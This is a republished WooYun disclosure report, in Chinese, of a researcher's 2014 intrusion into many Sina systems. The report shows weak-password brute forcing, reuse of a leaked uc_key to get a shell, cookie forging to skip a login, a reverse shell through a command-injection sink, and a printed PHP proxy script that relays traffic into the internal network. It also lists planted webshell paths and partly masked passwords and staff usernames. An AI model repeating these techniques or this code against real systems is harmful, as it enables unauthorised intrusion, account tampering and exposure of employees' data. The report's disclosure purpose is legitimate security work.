新浪漏洞礼包可任意修改微博内容个人信息等

admin
admin
admin
139803
文章
114
评论
2015年8月12日04:01:35评论178 views字数 201阅读0分40秒阅读模式
摘要

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-31: 细节向公众公开

漏洞概要 关注数(45) 关注此漏洞

缺陷编号: WooYun-2014-83508

漏洞标题: 新浪漏洞礼包可任意修改微博内容个人信息等

相关厂商: 新浪

漏洞作者: Noxxx

提交时间: 2014-11-16 20:54

公开时间: 2014-12-31 20:56

漏洞类型: 敏感信息泄露

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

8人收藏

漏洞详情

披露状态:

2014-11-16: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2014-12-31: 细节向公众公开

简要描述:

新浪漏洞礼包

详细说明:

http://***.sina.com.cn/ 这个 在DZ7.2注入爆出来的时候,我把它的 uc_key注入出来了保存了,后来发现这个 uc_key没变,遂getshell

地址:http://***.sina.com.cn/uc_server/data/tmp/a_ok.php

http://123.103.**.**/ 这个admin为弱口令:123456789 遂拿shell

地址:http://123.103.**.**/static/space/t4/space.php

http://**.video.sina.com.cn/ 新浪视频管理平台 弱口令很多。遗憾我只记录了一个。。请自查。

code 区域 
ju***ie:ju***ie

新浪漏洞礼包可任意修改微博内容个人信息等

http://***.video.sina.com.cn/live5/index.php/login 演播室管理系统,爆破之 弱口令很多。遗憾我只记录了一个。。请自查。

code 区域 
lian***a1:lian***a1

新浪漏洞礼包可任意修改微博内容个人信息等

http://202.108.*.**:8080/ 投放内容管理系统 爆破之, 弱口令很多。请自查

新浪漏洞礼包可任意修改微博内容个人信息等

http://202.106.**.**:8080/index.php 新浪图片过滤审核系统(估计是老系统了)

测试登录发现 登录失败都会 把一些cookie清空掉。于是我自己设置了cookie 然后登录上去了

新浪漏洞礼包可任意修改微博内容个人信息等

新浪漏洞礼包可任意修改微博内容个人信息等

http://202.108.**.**/ 这个 存在备份文件:htdocs.tar

下载下来 看了下代码 里面可以执行执行命令

code 区域 
$queryCmd=stripslashes ($_REQUEST['queryCmd']); 
 $command.="|$queryCmd";
 $resVal=exec($command,$res);

反弹了shell回来.FreeBSD 4.8p..开启代理的使用不了。

于是我看看 上次提交的漏洞那个ip 外网是不能访问了 可是我用它的内网ip正常访问,使用内网的webshell 开启代理了。

检查了上次的rsync的ip发现仍然能访问啊。

rsync 同步过去pub_admin_weibo_com_admin 这个里面一个 一句话。发现可以访问.但是过一会就没了。于是我执行 ifconfig获得ip后,中转了一下顺利的连接上

code 区域 
$post = http_build_query($_POST);
 $url = "http://pub.admin.weibo.com/cs.php";
 $ip=$_GET['ip'];
 echo dfopen($url,0,$post,'',FALSE,$ip);
 function dfopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE) {
  $return = '';
  $matches = parse_url($url);
  $host = $matches['host'];
  $path = $matches['path'] ? $matches['path'].(@$matches['query'] ? '?'.@$matches['query'] : '') : '/';
  $port = !empty($matches['port']) ? $matches['port'] : 80;
 
  if($post) {
   $out = "POST $path HTTP/1.0/r/n";
   $out .= "Accept: */*/r/n";
   $out .= "Accept-Language: zh-cn/r/n";
   $out .= "Content-Type: application/x-www-form-urlencoded/r/n";
   $out .= "User-Agent: X/r/n";
   $out .= "Host: $host/r/n";
   $out .= 'Content-Length: '.strlen($post)."/r/n";
   $out .= "Connection: Close/r/n";
   $out .= "Cache-Control: no-cache/r/n";
   $out .= "Cookie: $cookie/r/n/r/n";
   $out .= $post;
  } else {
   $out = "GET $path HTTP/1.0/r/n";
   $out .= "Accept: */*/r/n";
   $out .= "Accept-Language: zh-cn/r/n";
   $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]/r/n";
   $out .= "Host: $host/r/n";
   $out .= "Connection: Close/r/n";
   $out .= "Cookie: $cookie/r/n/r/n";
  }
  $fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);
  if(!$fp) {
   return '';
  } else {
   stream_set_blocking($fp, $block);
   stream_set_timeout($fp, $timeout);
   @fwrite($fp, $out);
   $status = stream_get_meta_data($fp);
   if(!$status['timed_out']) {
    while (!feof($fp)) {
     if(($header = @fgets($fp)) && ($header == "/r/n" ||  $header == "/n")) {
      break;
     }
    }
 
    $stop = false;
    while(!feof($fp) && !$stop) {
     $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit));
     $return .= $data;
     if($limit) {
      $limit -= strlen($data);
      $stop = $limit <= 0;
     }
    }
   }
   @fclose($fp);
   return $return;
  }
 }

管理平台的密码

新浪漏洞礼包可任意修改微博内容个人信息等

认证登录几乎都是使用ldap认证的,源码里有ldap的密码

新浪漏洞礼包可任意修改微博内容个人信息等

新浪漏洞礼包可任意修改微博内容个人信息等

新浪漏洞礼包可任意修改微博内容个人信息等

漏洞证明:

全部员工的信息..

贴几个密码

mask 区域 
*****Sina9*****
 *****ckhamh*****

同步了几个shell 地址:

mask 区域 
1.http://**.**.**/api/cs.php_
 2.http://**.**.**/include/sc.phpip=10.55.40.32_
 3.http://**.**.**/include/sc.phpip=10.73.14.45_
 4.http://**.**.**/include/sc.phpip=10.13.0.157_
 5.http://**.**.**/include/sc.phpip=10.13.0.158_
 6.http://**.**.**/include/sc.phpip=10.13.0.160_
 7.http://**.**.**/cs.php_
 8.http://**.**.**/cs.php_
 9.http://**.**.**/cs.php_
 10.http://**.**.**/cs.php_
 11.http://**.**.**/api/cs.php_
 12.http://**.**.**/album/uploads/as.php (上传的)_
 13.http://**.**.**/mh.php_
 14.http://**.**.**/lib/smarty/internals/core.load_xml.php

新浪漏洞礼包可任意修改微博内容个人信息等

(如果我能找到私匙的话 就能加密回SUB了,不过遗憾没找到。。)

找了一些接口,(还有些接口未测试)

获取任意微博:

新浪漏洞礼包可任意修改微博内容个人信息等

任意修改信息 包括昵称 说明 域名等等...

新浪漏洞礼包可任意修改微博内容个人信息等

修改任意已经发送的微博

新浪漏洞礼包可任意修改微博内容个人信息等

改了一下测试账号

新浪漏洞礼包可任意修改微博内容个人信息等

mask 区域 
*****ode*****
 ***** wang*****
 *****liuf*****
 *****liuji*****
 *****zhangt*****
 *****boy*****
 *****yingj*****
 ***** wen*****
 *****houw*****
 ***** sun*****
 *****xiy*****
 *****tingti*****
 ***** xi*****
 ***** chen*****
 ***** xia*****
 ***** wan*****
 *****yangzh*****
 *****jiaoj*****
 ***** zou*****
 ***** lik*****
 *****sunw*****
 ***** xia*****
 *****xiaow*****
 *****xiong*****
 *****luol*****
 ***** yin*****
 *****liqi*****
 ***** hai*****
 ***** yan*****
 ***** wang*****
 *****cod*****

修复方案:

自查弱口令,和下线一些过期的系统..

版权声明:转载请注明来源 Noxxx@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-11-18 00:24

厂商回复:

非常感谢这位安全研究员给我们反馈的安全问题,src进行安全问题验证再次表示感谢。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-11-16 21:43 | 小威 ( 普通白帽子 | Rank:535 漏洞数:71 | 活到老,学到老!)

    2

    越权?

  2. 2014-11-16 21:45 | 啊L川 新浪漏洞礼包可任意修改微博内容个人信息等 ( 普通白帽子 | Rank:195 漏洞数:37 | 菜鸟 ,菜渣, 菜呀!)

    1

    mark

  3. 2014-11-16 21:50 | 子非海绵宝宝 新浪漏洞礼包可任意修改微博内容个人信息等 ( 核心白帽子 | Rank:1413 漏洞数:143 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    这个屌!

  4. 2014-11-16 23:01 | 咸鱼翻身 ( 普通白帽子 | Rank:630 漏洞数:56 )

    1

    以马云为例→_→

  5. 2014-11-16 23:28 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    1

    @咸鱼翻身 马云没新浪微博,以王思聪为例吧。。

  6. 2014-11-16 23:29 | 子非海绵宝宝 新浪漏洞礼包可任意修改微博内容个人信息等 ( 核心白帽子 | Rank:1413 漏洞数:143 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    @px1624 用王思聪的wooyun会被收购的,用自己的吧.

  7. 2014-11-17 10:54 | 咸鱼翻身 ( 普通白帽子 | Rank:630 漏洞数:56 )

    1

    以德艺双馨为例

  8. 2014-12-31 22:10 | 魂淡、 ( 路人 | Rank:17 漏洞数:1 | 么么哒)

    1

    good job

  9. 2014-12-31 23:22 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student at THU.)

    1

    内容很丰富啊。

  10. 2015-01-01 00:11 | _Evil ( 普通白帽子 | Rank:431 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    1

    洞主总能发现奇怪 牛逼的东西 思密达 2015国家需要你

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin